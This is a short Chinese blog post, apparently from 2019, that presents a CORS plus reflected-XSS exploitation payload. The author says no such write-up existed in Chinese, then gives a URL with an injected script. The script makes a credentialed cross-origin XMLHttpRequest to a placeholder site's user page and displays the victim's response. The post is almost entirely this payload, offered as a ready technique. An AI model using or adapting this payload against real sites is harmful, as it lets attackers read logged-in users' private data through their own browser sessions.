CORS+XSS的漏洞利用payload

之前有人问我有没有CORS+XSS的利用姿势，翻了一下国内貌似都没有利用姿势于是就写了这篇文章！！！

首先找到一个反射xss，然后使用xss加载javascript代码达到跨域劫持目的payload如下：

http://xxx.com/index.php?uname=<script>function cors() { var xhttp = new XMLHttpRequest(); xhttp.onreadystatechange = function() { if (this.readyState == 4 && this.status == 200) { alert(this.responseText); document.getElementById("demo").innerHTML = this.responseText; } }; xhttp.open("GET", "http://xxx.com/user.php", true); xhttp.withCredentials = true; xhttp.send();}cors();</script>

posted @ 2019-08-03 18:56 最菜的Mat 阅读(978) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

最菜的Mat

一个修行信息安全，web安全，车联网安全，src漏洞挖掘的小菜鸡

CORS+XSS的漏洞利用payload

公告